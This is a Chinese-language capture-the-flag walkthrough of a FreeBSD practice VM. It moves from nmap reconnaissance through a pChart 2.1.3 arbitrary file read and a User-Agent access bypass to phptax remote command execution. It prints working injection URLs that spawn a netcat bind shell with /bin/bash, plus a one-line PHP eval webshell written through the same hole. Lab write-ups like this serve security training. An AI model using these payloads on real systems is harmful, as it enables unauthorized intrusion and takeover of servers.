一、前情提要
二、实战打靶
1. 信息收集
1.1. 主机发现
1.2. 端口扫描
1.3.目录遍历
1.4. 敏感信息
2.漏洞发现
2.1. 任意文件访问
2.2. web服务8080端口访问限制绕过
2.3. 远程命令执行
2.4. webshell进行getshell
2.5. 提权
一、前情提要
kali黑客-利用searchsploit搜索exp一键化攻击-CSDN博客
一篇文章带你理解nmap的使用-nmap使用手册-CSDN博客
类OCSP靶场-Kioptrix系列-Kioptrix Level 1-CSDN博客
类OCSP靶场-Kioptrix系列-Kioptrix Level 2-CSDN博客
类OCSP靶场-Kioptrix系列-Kioptrix Level 3-CSDN博客
类OCSP靶场-Kioptrix系列-Kioptrix Level 4-CSDN博客
类OCSP靶场-Kioptrix系列-Kioptrix Level 5-CSDN博客
二、实战打靶
这个靶机练习,相当于内网渗透。
1. 信息收集
1.1. 主机发现
在同一局域网下的主机发现思路:
-
通过ifconfig或ip add的方式查看当前主机的网段
-
利用nmap对扫描对应子网内的所有主机在线情况
执行完命令可以发现,该网段除了我们的kali还有一台主机在线。
(PS:在虚拟网络下1和2这两个ip分别对应的是网卡和网关。)
1.2. 端口扫描
-
命令:nmap -sT -sV - -O --min-rate 10000 -p- 192.168.xxx.xxx
-
-sT:以TCP三次握手的形式进行扫描
-
-sV:扫描各服务的版本
-
-O:扫描目标机器的操作系统
-
--min-rate:最少的发包数量
-
-p-:全端口扫描
-
1.3.目录遍历
啥也没爆破出来
1.4. 敏感信息
这个是根据端口探测、手工、目录爆破信息收集来的。
PORT STATE SERVICE VERSION 22/tcp closed ssh 80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8) 8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8) MAC Address: 00:0C:29:B6:28:51 (VMware) Device type: general purpose|specialized Running (JUST GUESSING): FreeBSD 9.X|10.X|7.X|8.X|6.X (94%), OpenBSD 4.X (88%), VMware ESXi 5.X (86%) OS CPE: cpe:/o:freebsd:freebsd:9 cpe:/o:freebsd:freebsd:10 cpe:/o:freebsd:freebsd:7 cpe:/o:freebsd:freebsd:8 cpe:/o:openbsd:openbsd:4.0 cpe:/o:vmware:esxi:5.0 cpe:/o:freebsd:freebsd:6.2 Aggressive OS guesses: FreeBSD 9.0-RELEASE - 10.3-RELEASE (94%), FreeBSD 7.0-RELEASE - 9.0-RELEASE (89%), OpenBSD 4.0 (88%), FreeBSD 9.3-RELEASE (88%), FreeBSD 7.0-RELEASE (87%), FreeBSD 7.1-PRERELEASE 7.2-STABLE (87%), FreeBSD 7.1-RELEASE (87%), FreeBSD 8.0-STABLE (87%), FreeBSD 8.1-RELEASE (86%), VMware ESXi 5.0 (86%) 80端口存在pChart2.1.3/index.php目录文件
2.漏洞发现
2.1. 任意文件访问
searchsploit "pChart 2.1.3"
#搜索根据敏感信息搜索框架漏洞
31173是个任意文件访问
这是个FreeBSD系统,FreeBSD系统中Apache的默认安装目录通常是/usr/local/www/apache2x,这是FreeBSD Ports系统中Apache HTTP Server的标准安装位置。如果你是通过ports安装的Apache,那么配置文件通常位于/usr/local/etc/apache2x目录下。 以下是一些常见的Apache目录和文件路径: 二进制文件: /usr/local/www/apache2x/bin/httpd 配置文件: /usr/local/etc/apache2x/httpd.conf 日志文件: /usr/local/var/log/apache2x 模块文件: /usr/local/www/apache2x/modules apache2x里面的x是不确定数字,但都是个位的一个一个试 在这个版本的FreeBSD系统,x是2,里面的apache2x全部替换成apache22
根据上面信息,我们查询一下它的配置文件,但是光这个任意文件访问是无法getshell的,因为权限过低一些可远程连接的文件无法访问读取。
2.2. web服务8080端口访问限制绕过
手工访问,发现无论输入什么目录都限制无权限访问。
利用前面的任意文件访问,从配置文件中查询8080端口的访问要求。找到了User-Agent必须带上Mozilla/4.0
我们用HackBar来实现访问的时候User-Agent带上Mozilla/4.0,发现存在新的页面
2.3. 远程命令执行
测试过后发现该页面都是一个PDF文件作用不大
继续信息收集,根据目录搜索发现了远程执行的exp不过是txt文件。
查看文件内容发现poc,里面存在nc和bash判断为远程命令执行的poc。
http://localhost/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make http://localhost/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make
直接执行失败了,并且该RCE无回显。
利用echo命令讲结果写入txt文本中查看,验证命令执行漏洞存在。
2.4. webshell进行getshell
经过测试好几个的反弹shell都失败了,考虑可以写文件,尝试写一个一句话木马进去上线,上线成功。
http://192.168.150.137:8080/phptax/drawimage.php?pfilez=xxx;echo '<?php eval($_POST[123]) ?>' > shell.php;&pdf=make
记得填写User-Agent,如果是本机上需要关闭杀毒软件,不然连接不成功。
2.5. 提权
反弹shell后进行内网信息收集
这个操作系统内核版本存在本地权限提升
发现无法下载
通过webshell管理器将,文件进行上传
提权成功